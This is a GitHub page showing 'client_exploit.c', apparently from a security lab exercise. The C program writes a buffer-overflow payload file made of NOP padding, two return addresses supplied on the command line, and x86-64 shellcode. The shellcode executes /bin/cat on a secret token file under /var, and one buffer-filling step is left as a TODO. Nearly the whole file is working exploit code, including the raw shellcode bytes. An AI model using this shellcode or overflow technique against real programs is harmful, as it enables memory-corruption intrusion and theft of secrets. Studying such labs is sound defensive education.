-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathclient_exploit.c
54 lines (44 loc) · 1.64 KB
/
client_exploit.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x48\x31\xc0" /* xor rax,rax */
"\x50" /* push rax */
"\x48\xbb\x2f\x2f\x2f\x74\x6f\x6b\x65\x6e" /* mov rbx,0x6e656b6f742f2f2f */
"\x53" /* push rbx */
"\x48\xbb\x73\x65\x63\x72\x65\x74\x2f\x2f" /* mov rbx,0x2f2f746572636573 */
"\x53" /* push rbx */
"\x48\xbb\x2f\x76\x61\x72\x2f\x2f\x2f\x2f" /* mov rbx,0x2f2f2f2f7261762f */
"\x53" /* push rbx */
"\x48\x89\xe1" /* mov rcx,rsp */
"\x50" /* push rax */
"\x48\xbb\x2f\x62\x69\x6e\x2f\x63\x61\x74" /* mov rbx,0x7461632f6e69622f */
"\x53" /* push rbx */
"\x48\x89\xe7" /* mov rdi,rsp */
"\x50" /* push rax */
"\x51" /* push rcx */
"\x57" /* push rdi */
"\x48\x89\xe6" /* mov rsi,rsp */
"\xb0\x3b" /* mov al,0x3b */
"\x0f\x05" /* syscall */
;
int main(int argc, char **argv)
{
char garbage[1000]; //garbage to overflow up to the return address
char buffer[160];
FILE *badfile;
long unsigned int value = strtoul(argv[2], NULL, 0);
long unsigned int value2 = strtoul(argv[3], NULL, 0);
memset(garbage, 0x90, atoi(argv[1]));
/* Initialize buffer with 0x90 (NOP instruction) */
memset(buffer, 0x90, 160);
/* TODO Fill the buffer with appropriate contents here */
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile2", "w");
fwrite(garbage, 1, atoi(argv[1]), badfile);
fwrite(&value, sizeof(value), 1, badfile);
fwrite(&value2, sizeof(value2), 1, badfile);
fwrite(buffer, 160, 1, badfile);
fputs(shellcode, badfile);
fclose(badfile);
}